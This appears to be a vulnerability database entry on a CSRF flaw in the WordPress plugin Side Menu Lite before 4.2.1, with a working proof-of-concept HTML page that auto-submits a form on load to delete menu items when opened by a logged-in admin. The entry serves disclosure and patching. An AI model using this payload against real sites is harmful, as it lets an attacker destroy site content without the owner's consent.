Lucene search
+L

Side Menu Lite < 4.2.1 - Menu Deletion via CSRF

🗓️ 11 Apr 2024 00:00:00Reported by Bob MatyasType 
wpexploit
 wpexploit
👁 144 Views

Side Menu Lite < 4.2.1 - CSRF Menu Deletion Po

Related
Code
Make a logged in admin open an HTML file where ID is a valid ID:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=side-menu-lite" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
``

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Apr 2024 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.0035
144